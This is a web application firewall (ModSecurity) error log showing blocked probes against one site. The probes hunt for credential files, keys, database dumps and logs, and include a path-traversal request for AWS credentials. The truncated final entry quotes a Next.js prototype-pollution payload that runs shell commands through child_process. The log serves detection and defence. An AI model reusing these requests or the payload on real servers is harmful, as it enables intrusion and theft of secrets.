.ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab-sgycV9LlDN1Y_DphbiwAAAIA"] [Sun Mar 22 10:46:59.945355 2026] [:error] [pid 8222:tid 8326] [client 185.177.72.50:1740] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab-sgycV9LlDN1Y_DphbjAAAAIo"] [Sun Mar 22 17:15:05.644250 2026] [:error] [pid 21858:tid 22053] [client 185.177.72.13:21426] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.bak"] [unique_id "acAHeWLIqNiY03ULMH4dkgAAARE"] [Sun Mar 22 17:15:06.246526 2026] [:error] [pid 21858:tid 22052] [client 185.177.72.13:21426] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "web.dev-unit.com"] [uri "/pms"] [unique_id "acAHemLIqNiY03ULMH4dmgAAARA"] [Sun Mar 22 17:15:23.082668 2026] [:error] [pid 21858:tid 22043] [client 185.177.72.13:9156] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "acAHi2LIqNiY03ULMH4eaAAAAQc"] [Sun Mar 22 17:15:26.143071 2026] [:error] [pid 21858:tid 22046] [client 185.177.72.13:9156] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "acAHjmLIqNiY03ULMH4ejQAAAQo"] [Sun Mar 22 17:15:28.953174 2026] [:error] [pid 21858:tid 22042] [client 185.177.72.13:38738] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "acAHkGLIqNiY03ULMH4ergAAAQY"] [Sun Mar 22 17:15:29.443045 2026] [:error] [pid 21858:tid 22052] [client 185.177.72.13:38738] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/server.key"] [unique_id "acAHkWLIqNiY03ULMH4etAAAARA"] [Sun Mar 22 17:15:29.898588 2026] [:error] [pid 21858:tid 22049] [client 185.177.72.13:38738] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php5.ini"] [unique_id "acAHkWLIqNiY03ULMH4euwAAAQ0"] [Sun Mar 22 17:15:34.112230 2026] [:error] [pid 21858:tid 22045] [client 185.177.72.13:38738] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.ini"] [unique_id "acAHlmLIqNiY03ULMH4e7AAAAQk"] [Sun Mar 22 17:15:34.338605 2026] [:error] [pid 21858:tid 22047] [client 185.177.72.13:38738] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/.aws/credentials.bak"] [unique_id "acAHlmLIqNiY03ULMH4e7wAAAQs"] [Sun Mar 22 17:15:34.961061 2026] [:error] [pid 21858:tid 22054] [client 185.177.72.13:38738] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/.bak"] [unique_id "acAHlmLIqNiY03ULMH4e9gAAARI"] [Sun Mar 22 17:15:49.007489 2026] [authz_core:error] [pid 21858:tid 22053] [client 185.177.72.13:10936] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/.htaccess [Sun Mar 22 17:16:39.404701 2026] [:error] [pid 29405:tid 29428] [client 185.177.72.13:60892] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/db.sql"] [unique_id "acAH13Fl_ot4pioqQY6cMAAAAVA"] [Sun Mar 22 17:16:39.415822 2026] [:error] [pid 29405:tid 29426] [client 185.177.72.13:60892] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "acAH13Fl_ot4pioqQY6cMQAAAU4"] [Sun Mar 22 17:16:40.319471 2026] [:error] [pid 29405:tid 29436] [client 185.177.72.13:60892] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "acAH2HFl_ot4pioqQY6cOQAAAVg"] [Sun Mar 22 17:16:50.312197 2026] [:error] [pid 29405:tid 29413] [client 185.177.72.13:60892] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dump.sql"] [unique_id "acAH4nFl_ot4pioqQY6cggAAAUE"] [Sun Mar 22 17:16:53.127392 2026] [:error] [pid 8222:tid 8322] [client 185.177.72.13:12798] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "acAH5ScV9LlDN1Y_Dpg1WQAAAIg"] [Sun Mar 22 17:17:25.221324 2026] [:error] [pid 21858:tid 22051] [client 185.177.72.13:19072] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/log/development.log"] [unique_id "acAIBWLIqNiY03ULMH4ibwAAAQ8"] [Sun Mar 22 17:17:26.548359 2026] [:error] [pid 21858:tid 22058] [client 185.177.72.13:19072] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/access.log"] [unique_id "acAIBmLIqNiY03ULMH4ihQAAARY"] [Sun Mar 22 17:17:26.575840 2026] [:error] [pid 21858:tid 22050] [client 185.177.72.13:19072] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/app.log"] [unique_id "acAIBmLIqNiY03ULMH4ihgAAAQ4"] [Sun Mar 22 17:17:26.593347 2026] [:error] [pid 21858:tid 22041] [client 185.177.72.13:19072] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/error.log"] [unique_id "acAIBmLIqNiY03ULMH4ihwAAAQU"] [Sun Mar 22 17:17:46.525734 2026] [:error] [pid 21858:tid 22045] [client 185.177.72.13:50100] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php.ini"] [unique_id "acAIGmLIqNiY03ULMH4jtwAAAQk"] [Thu Mar 26 21:06:21.929354 2026] [:error] [pid 9794:tid 9812] [client 13.231.118.205:35042] [client 13.231.118.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id 